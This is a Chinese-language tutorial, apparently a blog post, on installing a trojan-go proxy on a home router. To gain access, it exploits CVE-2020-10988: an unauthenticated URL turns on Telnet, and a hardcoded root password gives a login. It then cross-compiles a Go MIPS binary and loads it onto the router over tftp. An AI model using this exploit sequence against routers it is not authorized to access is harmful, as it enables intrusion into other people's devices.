• 如何在路由器上安裝代理服務：詳細教程
  • 步驟一：通過漏洞進入路由器系統
  • 開啟Telnet服務
  • 使用Telnet登錄路由器系統
  • 查看系統信息和CPU信息
  • 步驟二：交叉編譯MIPS程序
    • Go對MIPS的支持
  • 安裝TFTP Server
  • 使用BusyBox tftp傳輸文件
  • 在路由器系統中下載編譯后的main文件
  • 步驟三：安裝和運行代理服務
  • 結論
  • 相關參考：

如何在路由器上安裝代理服務：詳細教程

在這篇文章中，我們將詳細介紹如何在路由器上安裝代理服務。這包括從通過Telnet登錄路由器系統，到在路由器上運行代理程序的每一個步驟。

步驟一：通過漏洞進入路由器系統

首先，我們需要進入路由器的系統。可以通過搜索該路由器廠商的相關漏洞來實現這一點。例如，CVE-2020-10988是一個已知的漏洞，可以幫助我們訪問路由器系統。

開啟Telnet服務

訪問 http://192.168.0.1/goform/telnet，響應信息顯示 telnet is up. 表示Telnet服務已開啟。

使用Telnet登錄路由器系統

在命令行中輸入以下命令，使用默認的用戶名和密碼登錄路由器系統：

telnet 192.168.0.1
用戶名：root
密碼：Fireitup

查看系統信息和CPU信息

登錄成功后，輸入以下命令查看系統信息：

~ # cat /proc/version
Linux version 3.3.8 (root@linux-qxix) (gcc version 4.9.3 (Buildroot 2015.08) ) #1 Tue Dec 17 22:33:06 CST 2019

以及CPU信息：

~ # cat /proc/cpuinfo
system type             : Qualcomm Atheros QCA956X rev 0
machine                 : Qualcomm Atheros AP152 reference board
processor               : 0
cpu model               : MIPS 74Kc V5.0
BogoMIPS                : 385.84
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : yes
hardware watchpoint     : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented        : mips16 dsp
shadow register sets    : 1
kscratch registers      : 0
core                    : 0
VCED exceptions         : not available
VCEI exceptions         : not available

步驟二：交叉編譯MIPS程序

根據上一步獲取的CPU信息，我們知道該路由器使用的是MIPS架構的處理器。因此，我們需要使用Go語言交叉編譯一個MIPS程序。

Go對MIPS的支持

參考Go的官方文檔，確認Go對MIPS的支持情況：
獲取上述信息后，使用 Go 交叉編譯 MIPS 程序。
Go MIPS支持

安裝TFTP Server

我們需要安裝一個TFTP服務器以便在路由器和本地機器之間傳輸文件。可以使用tftpd64：

TFTP服務器

使用BusyBox tftp傳輸文件

路由器系統中一般預裝了BusyBox，可以使用tftp命令從TFTP服務器下載或上傳文件。

Usage: tftp [OPTIONS] HOST [PORT]Transfer a file from/to tftp server-l FILE Local FILE-r FILE Remote FILE-g      Get file-p      Put file-b SIZE Transfer blocks of SIZE octets

下載文件：

tftp -g -r FilePath Host

上傳文件：

tftp -p -l FilePath Host

在路由器系統中下載編譯后的main文件

tftp -g -r main 192.168.0.142
main                 100% |********************************************************|  1088k  0:00:00 ETA

下載完成后，給文件添加執行權限并運行：

chmod +x main
./main

運行后應該看到類似 Hello cheungxiongwei 的輸出。

步驟三：安裝和運行代理服務

下載trojan-go
我們選擇下載mips-softfloat版本的trojan-go。下載完成后，將壓縮包轉換成tar格式，以便在路由器系統中解壓。
部署代理即可通過路由器訪問外面的世界了。

結論

通過以上步驟，我們成功在路由器上安裝并運行了一個代理服務。這使得路由器能夠通過代理訪問外部網絡。通過詳細的教程，我們可以輕松實現這一目標，并為日后的網絡優化提供更多可能性。

相關參考：

• https://cloud.tencent.com/developer/article/2207058
• https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
• https://www.ise.io/wp-content/uploads/2020/08/kicking_devices_and_taking_cves.pdf